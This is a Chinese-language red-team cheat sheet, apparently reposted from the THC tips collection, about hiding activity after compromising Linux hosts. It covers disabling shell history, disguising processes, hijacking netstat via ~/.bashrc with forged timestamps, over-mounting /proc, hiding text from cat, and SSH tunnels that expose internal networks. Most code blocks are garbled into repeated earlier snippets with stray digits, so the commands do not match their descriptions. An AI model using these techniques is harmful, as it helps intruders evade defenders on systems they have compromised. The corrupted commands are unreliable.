精华技巧集结：红队实战备忘录

由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！

Bash 不记录历史记录：

告诉 Bash 使用/dev/null而不是~/.bash_history。这是我们在每个 shell 上执行的第一个命令。它将阻止 Bash 记录您的命令。

export HISTFILE=/dev/nullunset SSH_CONNECTION SSH_CLIENT

（如果我们使用 SSH 登录，我们还会清除 SSH_* 变量。否则我们启动的任何进程都会在 /proc/self/environ 中获取 IP 的副本。）

退出 shell 时“自杀”是很好的内务管理：

aliasexit='kill -9 $$'

任何以“”（空格）开头的命令也不会记录到历史记录中。

$  id

隐藏你的命令 / Daemonzie 你的命令

隐藏为“syslogd”。

(exec -a syslogd nmap -T0 10.0.2.1/24) # Note the brackets '(' and ')'

启动后台隐藏进程：

(exec -a syslogd nmap -T0 10.0.2.1/24 &>nmap.log &)

在GNU 屏幕中启动：

screen -dmS MyName nmap -T0 10.0.2.1/24

screen -x MyName

或者，如果没有 Bash：

cp `which nmap` syslogdPATH=.:$PATH syslogd -T0 10.0.2.1/24

在此示例中，我们执行nmap，但让它以名称syslogd出现在ps alxwww进程列表中。

隐藏您的命令行选项

使用zapper：

# Start Nmap but zap all options and show it as 'klog' in the process list:./zapper -a klog nmap -T0 10.0.0.1/24# Same but started as a daemon:(./zapper -a klog nmap -T0 10.0.0.1/24 &>nmap.log &)# Replace the existing shell with tmux (with 'exec').# Then start and hide tmux and all further processes - as some kernel process:exec ./zapper -f -a'[kworker/1:0-rcu_gp]' tmux

隐藏网络连接

劫持netstat并使用 grep 来过滤掉我们的连接。此示例过滤端口 31337或ip 1.2.3.4 上的任何连接。ss对于（netstat 替代方案）也应该做同样的事情。

方法 1 - 在 ~/.bashrc 中隐藏与 bash-function 的连接

剪切并粘贴此行以将行添加到 ~/.bashrc

echo 'netstat(){ command netstat "$@" | grep -Fv -e :31337 -e 1.2.3.4; }'>>~/.bashrc && touch -r /etc/passwd ~/.bashrc

或者将其剪切并粘贴到 ~/.bashrc 中以混淆条目：

aliasexit='kill -9 $$'0

~/.bashrc 的混淆条目将如下所示：

aliasexit='kill -9 $$'1

 隐藏与 $PATH 中的二进制文件的连接

在 /usr/local/sbin 中创建一个假的 netstat 二进制文件。在默认的 Debian（和大多数 Linux）上，PATH 变量 ( )在 /usr/bin 之前echo $PATH列出 /usr/local/sbin 。这意味着我们的劫持二进制文件 /usr/local/sbin/netstat 将被执行，而不是 /usr/bin/netstat。

aliasexit='kill -9 $$'2

以用户身份隐藏进程

继续“隐藏连接”，可以使用相同的技术来隐藏进程。此示例隐藏了 nmap 进程，并通过grep将其重命名为 GREP 来确保我们的进程不会出现在进程列表中：

aliasexit='kill -9 $$'3

以 root 身份隐藏进程

这需要 root 权限，并且是一个古老的 Linux 技巧，通过使用无用的目录过度安装 /proc/：

aliasexit='kill -9 $$'4

要隐藏命令，请使用：

aliasexit='kill -9 $$'5

隐藏 shell 脚本

上面我们讨论了如何混淆 ~/.bashrc 中的一行。一个经常使用的技巧是使用source替代。source 命令可以缩短为.（是的，一个点），它还会搜索 $PATH 变量以查找要加载的文件。

在此示例中，我们的脚本prng包含上面的所有 shell 函数。这些功能隐藏了nmap进程和网络连接。最后我们添加. prng到系统范围的 rc 文件中。prng这将在用户（和 root）登录时加载：

aliasexit='kill -9 $$'6

（同样适用于lsof、ss和ls）

躲猫

ANSI 转义字符或简单的r（回车符）可用于隐藏cat其他人。

隐藏最后一个命令（例如id：）~/.bashrc：

aliasexit='kill -9 $$'7

注意：我们使用echo -e转换\033为 ANSI 转义字符（十六进制 0x1b）。

添加r（回车符）对于隐藏您的 ssh 密钥有很大帮助cat：

aliasexit='kill -9 $$'8

SSH

几乎看不见的 SSH

阻止您出现在w或who命令中，并停止将主机记录到~/.ssh/known_hosts。

aliasexit='kill -9 $$'9

PTY 和颜色让您倍感舒适thcssh [email protected]：：

$  id0

SSH隧道

我们一直使用它来规避本地防火墙和 IP 过滤：

$  id1

您或任何其他人现在可以通过端口 31337 连接到您的计算机，并通过隧道连接到 1.2.3.4 端口 80，并显示源 IP“server.org”。另一种无需服务器的替代方案是使用gs-netcat。

聪明的黑客使用键盘组合~C动态创建这些隧道，而无需重新连接 SSH。

我们用它来让朋友访问不在公共互联网上的内部机器：

$  id2

连接到 server.org:31338 的任何人都将通过您的计算机通过端口 80 隧道连接到 192.168.0.5。另一种无需服务器的替代方案是使用gs-netcat。

SSHocks4/5隧道

OpenSSH 7.6 添加了对动态转发的袜子支持。示例：通过服务器传输所有浏览器流量。

$  id3

现在将您的浏览器配置为使用 SOCKS 127.0.0.1:1080。您的所有流量现在都通过server.org进行隧道传输，并将显示server.org的源 IP 。另一种无需服务器的替代方案是使用gs-netcat。

这与上面的例子相反。它允许其他人访问您的本地网络或让其他人使用您的计算机作为隧道端点。

$  id4

其他人配置 server.org:1080 作为他们的 SOCKS4/5 代理。他们现在可以连接到您的计算机有权访问的任何端口上的任何计算机。这包括访问本地网络上防火墙后面的计算机。另一种无需服务器的替代方案是使用gs-netcat。

SSH 到 NAT 后面的主机

ssh-j.com提供了出色的中继服务：访问 NAT/防火墙后面的主机（通过 SSH）。

在 NAT 后面的主机上：创建到ssh-j.com的反向 SSH 隧道，如下所示：

$  id5

然后从世界上任何其他地方使用此命令以“root”身份连接到“foobarblahblub”（NAT 后面的主机）：

$  id6

ssh 连接通过 ssh-j.com 进入反向隧道，到达 NAT 后面的主机。流量经过端到端加密，ssh-j.com 无法看到内容。

 SSH 转向多个服务器

在使用远程服务器时，SSH ProxyJump 可以为您节省大量时间并减少麻烦。让我们假设这样的场景：

我们的工作站是 $local-kali，我们喜欢通过 SSH 连接到 $target-host。我们的工作站和 $target-host 之间没有直接连接。我们的工作站只能达到$C2。$C2 可以到达 $internal-jumphost （通过内部 eth1），而 $internal-jumphost 可以通过 eth2 到达最终的 $target-host。

 $local-kali       -> $C2            -> $internal-jumphost    -> $target-host

eth0      192.168.8.160      10.25.237.119            

eth1                         192.168.5.130       192.168.5.135

eth2                                             172.16.2.120             172.16.2.121

除了我们值得信赖的工作站之外，我们不会ssh在任何计算机上执行 - 您也不会（永远）。

这就是 ProxyJump 提供帮助的地方：我们可以通过两个中间服务器 $C2 和 $internal-jumphost 进行“跳转”（无需在这些服务器上生成 shell）。ssh 连接在 $local-kali 和 $target-host 之间进行端到端加密，并且没有密码或密钥暴露给 $C2 或 $internal-jumphost。

$  id7

我们也用它来在登录服务器时隐藏我们的 IP 地址。

 发现主机

$  id8

tcp转储

$  id9

隧道与转发

(exec -a syslogd nmap -T0 10.0.2.1/24) # Note the brackets '(' and ')'0

HTTPS 反向隧道

在服务器上：

(exec -a syslogd nmap -T0 10.0.2.1/24) # Note the brackets '(' and ')'1

任一隧道都会为您生成一个新的 HTTPS-URL。在您的工作站上使用此 URL（见下文）。使用Gost在 HTTP(s) 链接上建立原始 TCP 隧道。

通过 HTTPS 的简单 STDIN/STDOUT 管道：

(exec -a syslogd nmap -T0 10.0.2.1/24) # Note the brackets '(' and ')'2

或者运行 Socks-Proxy（通过 HTTPS）：

(exec -a syslogd nmap -T0 10.0.2.1/24) # Note the brackets '(' and ')'3

在工作站上：

将端口 2222 转发到服务器的端口 22。

(exec -a syslogd nmap -T0 10.0.2.1/24) # Note the brackets '(' and ')'4

或将其用作 Socks 代理：

(exec -a syslogd nmap -T0 10.0.2.1/24) # Note the brackets '(' and ')'5

更多信息：https: //github.com/twelvesec/port-forwarding以及通过 Cloudflare 到任何 TCP 服务和Awesome Tunneling 的隧道。

 通过 Socks Proxy 使用任何工具

在目标网络上：

(exec -a syslogd nmap -T0 10.0.2.1/24) # Note the brackets '(' and ')'6

在您的工作站上：

(exec -a syslogd nmap -T0 10.0.2.1/24) # Note the brackets '(' and ')'7

查找您的公共 IP 地址

(exec -a syslogd nmap -T0 10.0.2.1/24) # Note the brackets '(' and ')'8

获取有关任何 IP 地址的地理位置信息：

(exec -a syslogd nmap -T0 10.0.2.1/24) # Note the brackets '(' and ')'9

通过IP地址获取ASN信息：

(exec -a syslogd nmap -T0 10.0.2.1/24 &>nmap.log &)0

检查 TOR 是否正常工作：

(exec -a syslogd nmap -T0 10.0.2.1/24 &>nmap.log &)1

检查世界各地的可达性

https://ping.pe/上的优秀人员可以让您 ping/traceroute/mtr/dig/port - 检查来自世界各地的主机、检查 TCP 端口、解析域名等等。

要检查您的（当前）主机连接互联网的情况，请使用OONI Probe：

(exec -a syslogd nmap -T0 10.0.2.1/24 &>nmap.log &)2

检查/扫描 IP 上的开放端口

Censys或Shodan端口查找服务：

(exec -a syslogd nmap -T0 10.0.2.1/24 &>nmap.log &)3

数据上传下载

无需curl的文件传输

使用 bash，仅下载：

(exec -a syslogd nmap -T0 10.0.2.1/24 &>nmap.log &)4

使用公共转储进行文件传输

剪切并粘贴到您的 bash 中：

(exec -a syslogd nmap -T0 10.0.2.1/24 &>nmap.log &)5

然后上传文件或目录：

(exec -a syslogd nmap -T0 10.0.2.1/24 &>nmap.log &)6

有用的命令

使用lsof -Pni或netstat -putan（或ss -putan）列出所有 Internet ( -tu ) 连接。

用于ss -lntp显示所有侦听 ( -l ) TCP ( -t ) 套接字。

使用netstat -rn或ip route show显示默认 Internet 路由。

用于curl cheat.sh/tar获取 tar 的 TLDR 帮助。与任何其他 Linux 命令一起使用。

用于curl -fsSL bench.sh | bash速度测试服务器。

通过长延迟链接或慢速链接进行黑客攻击可能会令人沮丧。每一次击键都是一一传递的，任何打字错误都会变得更加令人沮丧和耗时。rlwrap来救援。它会缓冲所有单个击键，直到按下Enter 键，然后立即传输整行。这使得高速打字、纠正拼写错误变得更加容易……

反向隧道接收端示例：

(exec -a syslogd nmap -T0 10.0.2.1/24 &>nmap.log &)7

SSH示例：

(exec -a syslogd nmap -T0 10.0.2.1/24 &>nmap.log &)8

还有很多，大家可以参考这网站

https://github.com/cclsh/thc-tips-tricks-hacks-cheat-sheet#useful-commands